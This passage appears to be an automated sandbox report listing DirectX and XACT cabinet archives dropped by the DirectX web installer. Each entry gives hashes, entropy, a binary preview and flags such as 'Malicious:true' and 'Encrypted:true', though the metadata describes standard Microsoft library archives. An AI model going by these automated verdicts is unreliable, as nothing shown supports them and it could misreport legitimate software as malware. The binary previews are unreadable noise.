                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#.............................5.a .d3dx9_32_x64.cat...C.......}5.h .d3dx9_32.dll......<C....5T_ .infinst.exe.....'CD....5.` .d3dx9_32_x64.inf.&....ED....5.` .dec2006_d3dx9_32_x64.inf... .....[...J .*.M.P..%A.P...?..O..V..=Z!R._...DQ..E..ha.;.CZ.D.....u8h..A....."3DW4.......o........I...-.[...L..X...ns.xm..M...os.$.cu=.k...Y.=M<.m.'..y.5...k..K.....7.k.B.$.p!E ......bf....n1...4..........T...{.7..........]&.{l7.g..6-.M.k.-3.j]6......m.......<.M..... ...ibM.@..=.....1....@....!4..A..bIxR.3..=.|@i../....f..R NO..7.N..+....SJ..b5)......(.S..5U..6...hG..b..7.....Ye..yu....^`.+.A...x.wn..NI.......>Ld..+|.ij&.4o..2Q.r.$.....}&l...d...|K......_.+.aSP.>...6@A...)\..kL...R.....F.b$~.."...e.):n......^..7..:.3$h~G.EA.A:..8).i......U....L..*PU.....s..$...v.-.:.u..:.DM...Y.......].x...<.z...`y.K...)d.{`......:.c......w.k....?.wU@...r....~.T....j.wg......K./...&,...?......:g....bZ.K#..^<..?...}.q.r....9.;.2..Mh<

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):144891
                                                                                              Entropy (8bit):7.997618513042835
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
                                                                                              MD5:219ABD58672661EA814E3739729DDC04
                                                                                              SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
                                                                                              SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
                                                                                              SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................ ...............#..................! .........5.a .xact2_5_x64.cat..E..! ....o5.\ .x3daudio1_1.dll.....9e.....5.` .xactengine2_5.dll.....QZ.....5T_ .infinst.exe.....ia.....5.` .dec2006_xact_x64.inf......d.....5.` .xact2_5_x64.inf....V.:..[.........A.P$..O.v..lM.!I.S.T..FJ%;..R.U..pj&...L..:.B. .W.I.... .3.43.`...W...kK..p......-].5....)R...V..vW...mu...]].M...al..5%:..vi,C .JH..81&..$..O!(..........D#`F.5......$.!..# F...4F.....4..E......Yx...>...6.b8..a..Bh.......`..`G2.9..0%.0y!..P8.M..L...j.-?d+...2.m..S..P2,`.cg...M.....M..^.....!.U..I.(..P.....<..p..@.......]..G..A&B.HD..(\.GM.......A..^!.B.W.U.L..r....A.".....t.0`@Zw.Fa...s....C.......Q...,.N...W.C.P........|...R.^@.....2..(..3.....N....z...wd\..O,...........~...J"GQO|...4... %.I.BU..>E+Y&r.HdA[.c..,.h.../F..k...>...$d....ko."T@os...N&..'.z...FJ.y..;. ......y...]..i`.@..O.........gk...NW.B...5-.....C........']~|..HR]....'.....|.n..).2..'.dT.G.....p......k.8!^...;.e

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1250707
                                                                                              Entropy (8bit):7.999567218170613
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
                                                                                              MD5:DCA673A8F9F834F9370862D1C97FD9E7
                                                                                              SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
                                                                                              SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
                                                                                              SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............{................#..............o...7.........E2.. .d3dx9_24_x64.cat...6.7.....E2.. .d3dx9_24.dll......26...E2h. .infinst.exe.......7...92.. .d3dx9_24_x64.inf. ..nl9..[.... Wnq..@..$Q.P...>.$..B;.*.......R...te.....K+.E...E%.....Zk...AQ.....8....C........h...:'iI....5B.'.:}..Y{-.H.6.*.......b...$.P........'..*..i.....H..i"8..$..........!"..."I.n6.Me6...Z..F)..P.^P..P.W.~........&V...q..~..'.AE.!...."...(.$.eP.HD..5................k..Ky%.>.kS....l.)...uN.-.$S.."......I@...bh./V.).A.....+.].....'.]....q.>.Uo...."..g...U.(...qXq.pH.L... ...."V.....Q.R....'>\...9.s............8....]gON..`a..S..u.O%.e.....U...H..CCr`.n...7=}...|z..3...k......CH.^.#..../.....c.rM_.`............"...y#.....YW...<..%CZ...=.c....ni......8.^....G.V.J8..". .?@.+R..'...m.7...JX...q....p.......:....zs..@.....9..w.Q......3+.......wt...G.\..V..8......B.=+.,#..l.Z..R.....F.=8.....#p..'......>.q.h...E.ME.^ig......./......".GB.O..Q...i.-r. .......

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....$.......D...........................$....#..............x.............C4.F .d3dx9_29_x64.cat..t:.......C4nE .d3dx9_29.dll......:...C45E .infinst.exe.......;...C4iF .d3dx9_29_x64.inf.&...2.;...C4iF .feb2006_d3dx9_29_x64.inf.l..3.9..[.... .q..@..$Q.P...>..$....)......2.k..LJ.].-.K+.E-h.k/Z.....Z..=....... b..=.o...........$.h...bT'7f.Q..2..;.o...M<C.u....xx..%..Z><..!_&'.Xq1E.Q...Q..[vP...d.I...........".(n(.....n.M....XA..J..C. ...c\*.....<......w.r..I.m..FM#....f..tdbdPR..Si:.:BQ...."..-.%...1U%.."Y..B.%.xF&S.V.<.).......6.^...D.(.eI.`.".p..?b..';.$..X.......H...$+...E....:_.b.(.0JF..E.w_..,..+.....$....+..AMBP..f.5..'....3 n.|...B ...0....t,.j.N..v}...WG.L.]..l....Q5..5..B.....X...^....U.~.x...%.....&wG/.5t.........T..G>.YjJ.].[..M^O......;.,.....]...1..__.K)sy...?.s.%.u.....a...!~..8.......F.^.%)N..c.J#....).`-.lz.T]..._..{..4...z?..p...H..%9)....y2.......S.{..h.K.....toRgh......D.V..%.?.|.?V.Vr1.......Jd..zz..C(.'...,.!.X.-..o....O...V!"..8..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........C4.F .xact_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V....C4CE .xactengine2_0.dll.3.........C4iF .feb2006_xact_x86.inf...........C4iF .xact_x86.inf......8..CK.|.\....l...X.".....Y2..ET.$..dd.$.........'...*....1..|;.b....=D0._.........{....twuUuuuUMw.-..1RR...{.;u.2.0... U*..U.U....4....s.7.T.(tJ..*.0.^..S8KIU.dQ(tvCdL...'G........{..%n...r.&....T....P...m0.....1{x.a..;.<0+..0[..0..8.x.'.<...r.Pv.Z..l...p.0..f..G.n.J.N...}.9@i...07..V....:.....8.'[...p(u....%...~.T*...R....D.Z.....Q....m.Y......1...%bq..ng..M..M.8....\/....D....M...A.+...zaK...$.8...d.%u....&5..9.....k(#=9@.._..3Nm..M.7......s...f'....... .')..).N....=..!.....HrDg..6.t.z..KxT.^....0.H..P.....[..Vv..jg.:."p.........a.A$.` ..'..0.....dgAw.qCc.,.K.|@.t...t6....8t...m.[..Hl7..K...[.m#.Z....~.%{a.6..t`...z....F... ..u..yK..,y.V!o...W.;.y.t.k.D..p./.Q)T*{..>.k...<.=H.V....c#...*[LFEZ0]I.:.....S...'..%s<.R.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Preview:MSCF....+.......D................!..........+....#...................)........86v| .xact2_6_x64.cat..E...)....(6.{ .x3daudio1_1.dll.h....n....86w{ .xactengine2_6.dll.h...&p....869{ .infinst.exe...........86.{ .feb2007_xact_x64.inf...........86.{ .xact2_6_x64.inf.{4&.Z=..[.....0...R.P...>..s*.N{.....9..J<.....AZ.Q.PQT9'..E.I....R..(.T$..........w?.Z....Q.b......!-...&..2Un ...TCY.t(.07#..I. ..... 8...".7.... P.....F......-q..Y+."-/....}W.].......l2..]T.H@o..t..^..@1..Yd.2f.@d..?%....B.H.r.P....l$..d.3w....J...%^..!.Q..q...$...C."...t....LO....=...E..'.Pw@!...>...`...v..|Z>.?Sv~.Eb=........R.../.....A....h.....Q|.w.e.e;..h..7.P......}.?R]... ...=.."`...F.t}>0...>.../`!...>..8......W.+.a....!@.`d.....p.b.!}..4..ma%..<..+8.%X.....u....v...C.;iW...0.}"....h...|*/r......c_...Y.p.F(G..N......o..#....P........).(........+.;...O...iOK.,.........A.x.k.....~..l....@.$z.D....C=b....S..}.+....7... .~...n..%XM...c_.'..B........\.....0..?.7...m7~......n@..Q...Y......._.f

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
